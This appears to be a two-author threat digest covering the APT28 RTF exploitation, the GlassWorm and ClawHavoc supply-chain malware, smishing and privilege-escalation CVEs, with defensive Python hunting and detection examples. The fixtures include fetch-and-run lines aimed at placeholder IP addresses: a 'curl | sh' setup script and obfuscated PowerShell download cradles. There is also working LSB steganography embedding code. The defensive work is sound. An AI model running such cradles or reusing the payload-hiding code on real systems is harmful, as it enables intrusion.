EvilBit Threat Digest - RTFs, Rogue Plugins, and a Side of Credential Theft
A digest of threats from weaponized RTFs and rogue editor extensions, plus credential-stealing campaigns, supply-chain abuses, and defender tips.
KryptoKat: There are times when the enemy kicks down the door… and times when they get invited in through your editor’s extension system and your inbox. This is the second kind.
UncleSp1d3r: Also: if an RTF attachment is doing COM hijacks and hiding shellcode in a PNG, it’s not “a document.” It’s a tiny haunted house with central heating.
Operation Neusploit: APT28 turns Office into a launchpad (CVE-2026-21509)
UncleSp1d3r: Zscaler’s ThreatLabz dropped a detailed write-up on “Operation Neusploit,” linking Russia-aligned APT28 to in-the-wild exploitation of CVE-2026-21509, a Microsoft Office security feature bypass triggered via weaponized RTF files. Microsoft shipped an out-of-band fix on 2026-01-26, and Zscaler places observed exploitation around 2026-01-29. That’s not a lot of breathing room. (APT28 Leverages CVE-2026-21509 in Operation Neusploit - Zscaler ThreatLabz, CVE-2026-21509 - NVD)
The delivery is the classic APT comfort food: spearphishing attachment → user opens it → exploit chain lights up. What’s less classic is the payload mix. Zscaler describes MiniDoor, an Outlook VBA-based email stealer that forwards victim mail to attacker-controlled addresses, and a second path using PixyNetLoader, a multi-stage loader built for staying power.
PixyNetLoader is where it gets spicy. Persistence is established with COM hijacking plus a scheduled task (specifically a task named OneDriveHealth). COM hijacking is one of those “if you’re not looking for it, you won’t see it” techniques: when Windows resolves a CLSID it consults the per-user HKCU\Software\Classes hive before the machine-wide HKLM one, so anyone who can write to HKCU (no admin rights needed) can point an existing class at their own DLL, which then loads whenever that COM object is instantiated, with nothing changed under HKLM. In this case, Zscaler points at a CLSID registry path under:
HKCU\Software\Classes\CLSID\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\InProcServer32, pointing to
%programdata%\USO\PublicData\UserEhStoreShell.dll
Then there’s the staging trick: shellcode pulled from a PNG via LSB steganography (hiding data in the least-significant bits). It’s not “new,” but it’s reliably annoying. Images move around environments more freely than EXEs, and a lot of tooling treats them as inert.
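To make the staging trick concrete, here is an added example (editor's code for this digest, not Zscaler's tooling and not a reconstruction of PixyNetLoader's encoder): a throwaway PNG writer and reader, an embed/extract pair that hides a length-prefixed payload one bit per colour channel, and a crude detector that compares how well the LSB plane compresses before and after embedding. The cover gradient and the placeholder "shellcode" are constructed; the reader only handles 8-bit RGB with filter type 0, which is spelled out in the code.

```python
"""LSB steganography in a PNG, end to end: a throwaway PNG writer/reader, an
embed/extract pair, and a crude detector. Added example for the digest, not
Zscaler's tooling and not PixyNetLoader's encoder; the "shellcode" is a
constructed placeholder and the cover image is a synthetic gradient."""
import random
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, body: bytes) -> bytes:
    # PNG chunk layout: length, tag, body, CRC32 over tag+body
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", zlib.crc32(tag + body) & 0xFFFFFFFF)


def write_png(width: int, height: int, rgb: bytes) -> bytes:
    """8-bit RGB PNG (colour type 2) with filter type 0 on every scanline."""
    assert len(rgb) == width * height * 3
    stride = width * 3
    raw = b"".join(b"\x00" + rgb[y * stride:(y + 1) * stride] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Walk chunks, inflate the IDAT stream, strip the per-row filter byte.
    Only filter type 0 is implemented; a real sample needs a full decoder (e.g. Pillow)."""
    assert data[:8] == PNG_SIG, "not a PNG"
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            assert (depth, ctype) == (8, 2), "example handles 8-bit RGB only"
        elif tag == b"IDAT":
            idat += body
        elif tag == b"IEND":
            break
        pos += 12 + length  # 4 length + 4 tag + body + 4 CRC
    raw = zlib.decompress(idat)
    stride = width * 3
    rows = []
    for y in range(height):
        row = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        assert row[0] == 0, "only filter type 0 is handled here"
        rows.append(row[1:])
    return width, height, b"".join(rows)


def embed(rgb: bytes, payload: bytes) -> bytes:
    """Write a 4-byte little-endian length then the payload, one bit per channel byte, LSB first."""
    blob = struct.pack("<I", len(payload)) + payload
    bits = [(b >> i) & 1 for b in blob for i in range(8)]
    assert len(bits) <= len(rgb), "cover image too small for payload"
    out = bytearray(rgb)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def extract(rgb: bytes) -> bytes:
    """Inverse of embed(): read the length prefix, then that many bytes."""
    def read(n_bytes: int, bit_offset: int) -> bytes:
        out = bytearray()
        for k in range(n_bytes):
            v = 0
            for i in range(8):
                v |= (rgb[bit_offset + k * 8 + i] & 1) << i
            out.append(v)
        return bytes(out)
    (n,) = struct.unpack("<I", read(4, 0))
    return read(n, 32)


def lsb_plane_ratio(rgb: bytes) -> float:
    """Compressed size / raw size of the packed LSB plane. A smooth cover has a
    structured, compressible plane; embedded ciphertext-like bytes push the ratio
    toward 1. Crude: noisy photos have random-looking LSBs to begin with, so real
    detection uses sample-pair / chi-square analysis rather than this."""
    plane = bytearray()
    for i in range(0, len(rgb) - 7, 8):
        byte = 0
        for j in range(8):
            byte |= (rgb[i + j] & 1) << j
        plane.append(byte)
    return len(zlib.compress(bytes(plane), 9)) / len(plane)


def demo():
    """Round-trip a constructed payload through a real PNG and compare LSB ratios."""
    w = h = 64
    cover = bytes(c for y in range(h) for x in range(w)
                  for c in ((x * 4) & 0xFF, (y * 4) & 0xFF, ((x + y) * 2) & 0xFF))
    fake_shellcode = bytes(random.Random(7).getrandbits(8) for _ in range(200))  # constructed, inert
    png = write_png(w, h, embed(cover, fake_shellcode))
    _, _, pixels = read_png(png)
    return extract(pixels) == fake_shellcode, lsb_plane_ratio(cover), lsb_plane_ratio(pixels)


if __name__ == "__main__":
    ok, clean, stego = demo()
    print(f"recovered={ok} lsb_ratio clean={clean:.3f} stego={stego:.3f}")
```

The detector is the part worth dwelling on: it works here because the cover is smooth, and it says nothing about a JPEG-sourced photo whose low bits were already noise. That is exactly why images make good carriers; the defender's practical lever is the loader that reads them, not the PNG itself.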
The endgame: a Covenant Grunt implant, with a C2 bridge abusing the Filen API. Add some geo/User-Agent gating on the server side (don’t serve the good stuff to sandboxes), and you’ve got a chain designed to waste analyst time and keep defenders arguing with their own telemetry.
KryptoKat (what to do today):
- Patch Office for CVE-2026-21509 across affected versions called out by Microsoft/Zscaler (Office 2016/2019/LTSC/365 Apps). (Zscaler)
- Hunt for the pivots Zscaler published: the OneDriveHealth scheduled task, the COM hijack registry keys, dropped artifacts such as Microsoft\Outlook\VbaProject.OTM under %appdata%, and the PNG drop under %programdata%.
- Block and investigate the campaign infrastructure Zscaler listed, including freefoodaid.com and wellnesscaremed.com. (Zscaler)
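One way to turn the COM-hijack pivot into a hunt, as an added example (editor's code, not Zscaler's query): score every per-user InProcServer32 registration on the shape of the hijack rather than only on the published CLSID. The registry walk and the schtasks check only run on Windows; the scoring works on plain tuples so it can be exercised anywhere, including against a constructed record of the Neusploit indicator. Per-user COM servers under %localappdata% are legitimate for some desktop apps, so treat the "user-writable location" reason as a lead, not a verdict.

```python
"""Triage of per-user COM registrations of the shape used by PixyNetLoader.
Added example for this digest; not Zscaler's hunt logic. HKCU\\Software\\Classes
is consulted before HKLM when a CLSID is resolved, so a per-user InProcServer32
that re-points a class to a DLL in a user-writable location is the classic hijack
shape. score() works on plain tuples so it runs anywhere; the registry walk and
the scheduled-task check only run on Windows."""
import subprocess
import sys

# Locations a normal COM server should not live in (user/data writable).
WRITABLE_HINTS = ("%programdata%", "%appdata%", "%localappdata%", "%temp%",
                  "\\programdata\\", "\\appdata\\", "\\users\\", "\\temp\\")
# Indicator from the Zscaler write-up quoted in the digest above.
NEUSPLOIT_CLSID = "{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}"
NEUSPLOIT_DLL = "userehstoreshell.dll"
TASK_NAME = "OneDriveHealth"


def score(clsid: str, hkcu_server: str, hklm_server=None) -> list:
    """Reasons a per-user InProcServer32 entry deserves a look (empty list = nothing seen)."""
    reasons = []
    user = hkcu_server.strip('"').lower()
    if clsid.upper() == NEUSPLOIT_CLSID and user.endswith(NEUSPLOIT_DLL):
        reasons.append("matches the published Operation Neusploit IOC")
    if hklm_server is not None and hklm_server.strip('"').lower() != user:
        reasons.append("HKCU entry shadows a different HKLM server for the same CLSID")
    if any(h in user for h in WRITABLE_HINTS):
        reasons.append(f"server DLL in a user-writable location: {hkcu_server}")
    return reasons


def enumerate_hkcu_inprocservers():
    """Windows only: yield (clsid, hkcu_server, hklm_server_or_None) for every HKCU CLSID with InProcServer32."""
    import winreg
    base = r"Software\Classes\CLSID"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, base) as root:
        i = 0
        while True:
            try:
                clsid = winreg.EnumKey(root, i)
            except OSError:
                break
            i += 1
            try:
                with winreg.OpenKey(root, clsid + r"\InProcServer32") as k:
                    hkcu_server = winreg.QueryValueEx(k, "")[0]
            except OSError:
                continue  # no per-user in-process server for this class
            try:
                with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base + "\\" + clsid + r"\InProcServer32") as k:
                    hklm_server = winreg.QueryValueEx(k, "")[0]
            except OSError:
                hklm_server = None
            yield clsid, hkcu_server, hklm_server


def scheduled_task_xml(name: str):
    """Windows only: the task's XML (inspect <Actions>/<Exec>) or None if no such task exists."""
    r = subprocess.run(["schtasks", "/Query", "/TN", name, "/XML"], capture_output=True, text=True)
    return r.stdout if r.returncode == 0 else None


if __name__ == "__main__":
    # Constructed record in the shape of the published IOC, used when not on Windows.
    records = [(NEUSPLOIT_CLSID, r"%programdata%\USO\PublicData\UserEhStoreShell.dll", None)]
    if sys.platform == "win32":
        records = list(enumerate_hkcu_inprocservers())
    for clsid, user_dll, machine_dll in records:
        for reason in score(clsid, user_dll, machine_dll):
            print(clsid, "->", reason)
    if sys.platform == "win32":
        print(f"{TASK_NAME} task:", "present" if scheduled_task_xml(TASK_NAME) else "absent")
```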
Marketplace malware, part ∞: extensions and “skills” bite developers again
Update: from “malicious VS Code extensions” to Open VSX distributing GlassWorm
KryptoKat: Since we last talked about sketchy editor extensions turning dev workstations into snack bars for threat actors, here’s the sequel: same genre, new theater.
A supply chain incident in the Open VSX Registry (the open alternative ecosystem for VS Code-compatible extensions) pushed GlassWorm malware via compromised extensions, apparently using a compromised developer publishing account as the injection point. The impact is the usual dev-box catastrophe set: credential theft, crypto targeting, and macOS data collection. (Open VSX Supply Chain Attack Used Compromised Dev Account to Spread GlassWorm, Socket: GlassWorm Loader Hits Open VSX via Suspected Developer Account Compromise, Fluid Attacks: GlassWorm supply chain attack – VS Code Extensions)
UncleSp1d3r: The part that keeps repeating: the “exploit” is rarely a memory corruption bug. It’s publishing rights. If I can ship code to your editor, I don’t need to bypass your EDR. I just need you to click “Update.”
Practical takeaways:
- Treat editor extension ecosystems as code execution pipelines, not “nice-to-have tooling.”
- Lock down extension installation/update sources in enterprise-managed dev environments where you can.
- Audit publisher accounts and rotate/secure publishing credentials like they’re production keys (because they are).
ClawHavoc: malicious “skills” in a bot ecosystem (341 found, 335 drop AMOS)
UncleSp1d3r: Koi’s report on ClawHavoc is the same supply-chain story wearing a different costume: not an IDE marketplace this time, but a bot/agent ecosystem (“skills” for OpenClaw/ClawHub). They found 341 malicious skills, 335 tied to deploying AMOS (Atomic macOS Stealer), plus a handful of outliers. (ClawHavoc: 341 Malicious Clawed Skills Found by the Bot They Were Targeting)
Koi describes a familiar operator playbook: obfuscation, hiding scripts inside “prerequisites,” and generally making the malicious behavior look like normal setup friction. The point isn’t elegance; it’s scale. If your platform encourages plug-and-play community contributions, you’ve built a distribution channel. Attackers love distribution channels.
KryptoKat (defender posture):
- Disable or heavily gate auto-install from untrusted marketplaces.
- Require integrity/provenance checks where possible (signing, verified publishers, internal mirrors).
- For dev/agent tools: assume “skill” packages can contain installers, downloaders, and credential harvesting logic, and review accordingly. (Koi)
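A first-pass review for both the Open VSX extension case above and the ClawHavoc "skills" case, as an added example (editor's code, not the Open VSX, Socket or Koi tooling, and not a model of GlassWorm or ClawHavoc specifically): a static triage pass over an unpacked package directory that flags the shapes both stories share, that is, install-time hooks that execute (the "prerequisites" trick), process spawning and eval, large base64 blobs, invisible Unicode code points in source, and hard-coded IP callbacks. The sample tree is constructed in a temp directory; every hit is a lead for a human, not a verdict.

```python
"""Static triage for an editor extension or agent "skill" package before it is
allowed to run. Added example; not the Open VSX, Koi or Socket tooling and not a
model of GlassWorm or ClawHavoc specifically. Hits are leads for review, not
verdicts: plenty of honest packages spawn processes or embed base64."""
import json
import pathlib
import re
import tempfile

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SOURCE_EXT = {".js", ".mjs", ".cjs", ".ts", ".py", ".sh", ".ps1"}
RISKY_CALLS = re.compile(r"\beval\s*\(|\bnew\s+Function\b|child_process|\b(?:exec|execSync|execFile|spawn|spawnSync)\s*\(")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
# zero-width chars, BOM, variation selectors and Unicode tag characters: invisible in most editors
INVISIBLE = re.compile("[\u200b-\u200f\u2060-\u2064\ufeff\ufe00-\ufe0f\U000e0000-\U000e007f]")
RAW_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}")


def scan_package(root: str) -> list:
    """Return (path, reason) pairs for everything worth a human look."""
    findings = []
    root_p = pathlib.Path(root)
    manifest = root_p / "package.json"
    if manifest.is_file():
        data = json.loads(manifest.read_text(encoding="utf-8"))
        for hook, cmd in data.get("scripts", {}).items():
            if hook in INSTALL_HOOKS:
                findings.append((str(manifest), f"install-time hook '{hook}' runs: {cmd}"))
        if "*" in data.get("activationEvents", []):
            findings.append((str(manifest), "activationEvents '*' (code runs at every editor start)"))
    for path in sorted(root_p.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SOURCE_EXT:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if INVISIBLE.search(text):
            findings.append((str(path), "invisible Unicode code points in source"))
        if RISKY_CALLS.search(text):
            findings.append((str(path), "eval / process-spawning call"))
        if BASE64_BLOB.search(text):
            findings.append((str(path), "base64 blob of 200+ chars"))
        if RAW_IP_URL.search(text):
            findings.append((str(path), "URL with a raw IP address"))
    return findings


def summarize(findings: list) -> dict:
    """basename -> list of reasons, for quick reading."""
    out = {}
    for p, reason in findings:
        out.setdefault(pathlib.Path(p).name, []).append(reason)
    return out


def build_sample_tree() -> str:
    """Constructed package tree: one dirty setup script, one clean extension entry point."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="ext-triage-"))
    (root / "package.json").write_text(json.dumps({
        "name": "helpful-theme", "version": "1.0.3",
        "scripts": {"postinstall": "node setup.js"},
        "activationEvents": ["*"],
    }), encoding="utf-8")
    blob = "QUJD" * 60  # 240 chars of valid-looking base64
    (root / "setup.js").write_text(
        'const cp = require("child_process");\u200b\n'  # zero-width space hidden after the semicolon
        f'const stage = Buffer.from("{blob}", "base64").toString();\n'
        'cp.execSync("curl -s http://203.0.113.9/p | sh");\n', encoding="utf-8")
    (root / "extension.js").write_text(
        'exports.activate = (ctx) => { console.log("theme loaded"); };\n', encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    for path, reason in scan_package(build_sample_tree()):
        print(f"{path}: {reason}")
```

Run it against an unpacked .vsix (it is a zip; the extension lives under extension/) or a skill directory before allowing installation. The invisible-Unicode check is cheap and catches a whole class of "the diff looked empty" tricks; the rest is ordinary pattern matching that an internal mirror can run on every new version before it is exposed to developers.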
Social engineering isn’t dead. It’s just on your lock screen.
INPS-themed smishing targets Italian citizens for employment/CUD data
KryptoKat: CERT-AGID warned about an INPS-themed smishing campaign targeting Italian citizens, luring victims into handing over sensitive employment and CUD-related data, prime identity-theft material. They included specific malicious infrastructure, such as the domain inpsdati.it, which makes this more than “be careful out there.” (CERT-AGID advisory)
If you operate in Italy (or support users who do):
- Block known URLs/domains from the advisory at DNS/web controls.
- Make sure your user messaging is specific: “INPS will not ask for this over SMS; verify via official channels.”
McDonald’s tells customers to use better passwords (yes, really)
UncleSp1d3r: In the “we live in a simulation written by a tired intern” corner, McDonald’s ran a password-hygiene push because menu-item passwords are showing up frequently in compromised credential sets. Predictable passwords are still doing predictable things. (McDonald's tells customers to use better passwords, McDonald’s Netherlands Takes Passwords to the Streets)
Blue-team translation: if your org still allows weak passwords without MFA, you’re not defending accounts. You’re curating a future incident report.
Defender’s workshop: detection engineering as an arms race (PowerShell edition)
KryptoKat: A thoughtful piece from detect.fyi frames detection engineering as game theory. Every detection creates incentives for evasions, and the “win condition” is often resilience rather than perfect prevention, especially in PowerShell land where encoding/obfuscation is basically part of the ecosystem. (Move and Countermove: Game Theory Aspects of Detection Engineering)
Even if you don’t buy the framing, the operational advice is solid:
- Prefer detections that focus on effects (process trees, suspicious parent/child chains, credential access) over brittle string matches.
- Decode and normalize what you can (base64 parameters, script block logging) so “obfuscation” stops being invisibility and becomes just… noise you can parse.
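What "decode and normalize, then match on effects" looks like in practice, as an added example (editor's code, not the detect.fyi author's): a triage pass over process-creation command lines that unwraps -EncodedCommand and its accepted abbreviations, decodes one layer of FromBase64String(), strips backtick and string-concatenation obfuscation, and only then applies a handful of behaviour rules. The four sample command lines are constructed (Security 4688 / Sysmon 1 shape, TEST-NET address); the same encoded cradle is caught whether it arrives base64-wrapped, backtick-mangled, or nested.

```python
"""Effect-first PowerShell triage over process-creation command lines. Added
example for this digest, not the detect.fyi author's code. Decode and normalize
first; match on behaviour second. Sample command lines are constructed."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; "-e" and "-ec" are the common short forms.
_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}, key=len, reverse=True)
ENC_FLAG = re.compile(r"(?:^|\s)[-/](?:%s)\s+([A-Za-z0-9+/=]{16,})" % "|".join(_PREFIXES), re.I)
B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)

RULES = {  # behaviours, not strings: each survives most cosmetic obfuscation once the text is normalized
    "download_cradle": re.compile(r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|\bcurl\b|net\.webclient|start-bitstransfer"),
    "invoke_expression": re.compile(r"invoke-expression|\biex\b"),
    "hidden_window": re.compile(r"-w[a-z]*\s+hid"),
    "amsi_tamper": re.compile(r"amsiutils|amsiinitfailed|amsiscanbuffer"),
}


def _b64(s: str) -> bytes:
    return base64.b64decode(s + "=" * (-len(s) % 4))


def _decode_text(raw: bytes) -> str:
    # -EncodedCommand is always UTF-16LE; nested blobs may be UTF-8, so guess by NUL density
    if raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def expand(cmdline: str) -> str:
    """Append each decoded layer to the command line so the rules see the real script body."""
    text = cmdline
    m = ENC_FLAG.search(cmdline)
    if m:
        try:
            text += " " + _b64(m.group(1)).decode("utf-16-le", errors="replace")
        except ValueError:
            pass  # not valid base64 after all; keep the raw line
    for blob in B64_ARG.findall(text):  # one level of nesting is enough to show the point
        try:
            text += " " + _decode_text(_b64(blob))
        except ValueError:
            pass
    return text


def normalize(text: str) -> str:
    text = text.replace("`", "")                          # I`E`X -> IEX
    text = re.sub(r"['\"]\s*\+\s*['\"]", "", text)        # 'Down'+'load' -> Download
    return re.sub(r"\s+", " ", text).lower()


def analyze(cmdline: str) -> dict:
    norm = normalize(expand(cmdline))
    return {"normalized": norm, "hits": [name for name, rx in RULES.items() if rx.search(norm)]}


def encode_command(script: str) -> str:
    """The -EncodedCommand form PowerShell expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
_nested_blob = base64.b64encode(CRADLE.encode()).decode()
SAMPLES = {  # constructed, in the shape of Security 4688 / Sysmon 1 command lines
    "encoded": f"powershell.exe -nop -w hidden -enc {encode_command(CRADLE)}",
    "backticks": 'powershell.exe -c "I`E`X (New-Object Net.Web`Client).Down`loadString(\'http://203.0.113.5/b\')"',
    "nested": 'powershell.exe -NoProfile -Command "IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\''
              + _nested_blob + '\')))"',
    "benign": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(f"{name:10s} hits={analyze(line)['hits']}")
```

The point of the layout is that RULES never changes when a new encoding trick shows up; only expand() and normalize() grow. That is the resilience the detect.fyi piece is talking about: the attacker's countermove costs them a new wrapper, and it costs you one more line in the decoder, not a new detection.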
Policy weather (because it will hit your budget)
Federal shutdowns and cybersecurity drag
KryptoKat: A Forbes piece (with broader discussion echoed in public commentary) highlights how shutdown dynamics can stall cybersecurity R&D and deployment timelines. It’s less “headline breach,” more “slow erosion of capability.” This matters if your programs depend on federal partnerships, grants, or just the downstream effects of delayed modernization. (Forbes, Politico)
SBOM guidance rollback draws sharp criticism
UncleSp1d3r: Dark Reading covered criticism (including from OWASP’s founder) around rescinding Biden-era SBOM-related guidance, potentially reducing procurement pressure for attestations and NIST SSDF alignment. Politics aside, the operational reality is simple: if your buyers stop asking for supply-chain transparency, vendors stop feeling the heat. (Dark Reading)
Defender takeaway: don’t wait for mandates to justify SBOM intake and secure development requirements. If you can ask for provenance, you should.
Patch shelf: Nessus plugins and two quiet-but-real local escalation CVEs
KryptoKat: Tenable pushed a batch of Nessus plugin updates touching common enterprise stacks (including identity platforms and major Linux distros). If you treat scanner updates as “background noise,” this is your reminder that scanners only find what they know how to look for. (Nessus Plugin Updates)
Two CVEs called out in the update stream are both in the “local privilege escalation via installer/package permissions” family:
- CVE-2024-22029: insecure permissions in packaging (described in NVD as a Tomcat packaging race-to-root scenario). (NVD)
- CVE-2025-2759: incorrect folder permissions in an installer, enabling local privilege escalation (NVD references ZDI). (NVD)
Plain-English takeaway: these aren’t the flashy internet RCEs, but they matter in real environments. They matter most where endpoints are shared, build agents are messy, or “developer workstation” means “local admin with a browser and a dream.”
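The check a practitioner wants for this family of bugs, as an added example (editor's code for POSIX hosts, not Tenable's plugin logic and not specific to either CVE above): walk the directory chain above a root-run launcher, plus the service's own directories, and flag anything an unprivileged local user could rename, replace or pre-create. That is the whole mechanism behind "insecure permissions in packaging": the installer creates a directory with the wrong mode, and whoever gets there first owns what root executes. The sample tree is constructed in a temp directory with one deliberately 0777 bin directory.

```python
"""Permission audit for the directory chain a privileged service executes from.
Added example for this digest (POSIX hosts), not Tenable's plugin logic and not
specific to either CVE named above. The sample tree is constructed."""
import os
import stat
import tempfile


def lineage(path: str) -> list:
    """'/opt/tomcat/bin/catalina.sh' -> ['/', '/opt', '/opt/tomcat', '/opt/tomcat/bin', '/opt/tomcat/bin/catalina.sh']."""
    path = os.path.abspath(path)
    chain = []
    while True:
        chain.append(path)
        parent = os.path.dirname(path)
        if parent == path:
            return chain[::-1]
        path = parent


def audit_paths(paths, trusted_uids=(0,)) -> list:
    """(path, reason) for every component an untrusted local user could tamper with."""
    findings = []
    for p in paths:
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            findings.append((p, "missing (a local user could create it first)"))
            continue
        mode = st.st_mode
        if stat.S_ISLNK(mode):
            findings.append((p, "symlink in the path (target can be swapped)"))
            continue
        is_dir = stat.S_ISDIR(mode)
        # world-writable is fine only for a sticky directory (/tmp style); never for a file
        if mode & stat.S_IWOTH and not (is_dir and mode & stat.S_ISVTX):
            findings.append((p, "world-writable " + ("directory without sticky bit" if is_dir else "file")))
        elif mode & stat.S_IWGRP and st.st_gid != 0:
            findings.append((p, f"group-writable (gid {st.st_gid})"))
        if st.st_uid not in trusted_uids:
            findings.append((p, f"owned by uid {st.st_uid}, not a trusted account"))
    return findings


def audit_launcher(launcher: str, trusted_uids=(0,)) -> list:
    """Check every ancestor of the launcher: a writable parent lets you rename the whole subtree away."""
    return audit_paths(lineage(launcher), trusted_uids)


def build_sample_tree() -> str:
    """Constructed layout: a root-run launcher under a bin/ the installer left 0777."""
    base = tempfile.mkdtemp(prefix="pkgperm-")
    for sub, mode in (("bin", 0o777), ("logs", 0o1777), ("conf", 0o755)):
        d = os.path.join(base, sub)
        os.makedirs(d)
        os.chmod(d, mode)
    launcher = os.path.join(base, "bin", "catalina.sh")
    with open(launcher, "w") as fh:
        fh.write("#!/bin/sh\nexec java -jar bootstrap.jar\n")
    os.chmod(launcher, 0o755)
    return launcher


def demo() -> dict:
    """basename -> reasons for the constructed tree, trusting root and the current user."""
    launcher = build_sample_tree()
    base = os.path.dirname(os.path.dirname(launcher))
    trusted = (0, getattr(os, "getuid", lambda: 0)())
    targets = list(dict.fromkeys(lineage(launcher) + [e.path for e in os.scandir(base) if e.is_dir()]))
    out = {}
    for p, reason in audit_paths(targets, trusted):
        out.setdefault(os.path.basename(p) or "/", []).append(reason)
    return out


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, reasons)
```

In the constructed tree only bin/ is reported: logs/ is world-writable too, but its sticky bit means users cannot rename or unlink each other's files there, which is the distinction the packaging bugs get wrong. Point audit_launcher() at the ExecStart of any root-run unit after a package upgrade and you have a cheap regression check for this whole CVE family.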
Closing: the attacker’s favorite feature is “Install”
KryptoKat: This issue had a theme, and it wasn’t subtle: execution by convenience. RTFs that shouldn’t execute do. Extensions that shouldn’t be trusted are. Marketplaces that shouldn’t be “production pipelines” become exactly that.
UncleSp1d3r: If you need a 1980s sci-fi moral: the monster isn’t always in the mainframe. Sometimes it’s in the add-on menu.
Keep your Office patched, treat plugin ecosystems like hostile code, and remember that “publisher access” is just another name for “production access.”
-KryptoKat & UncleSp1d3r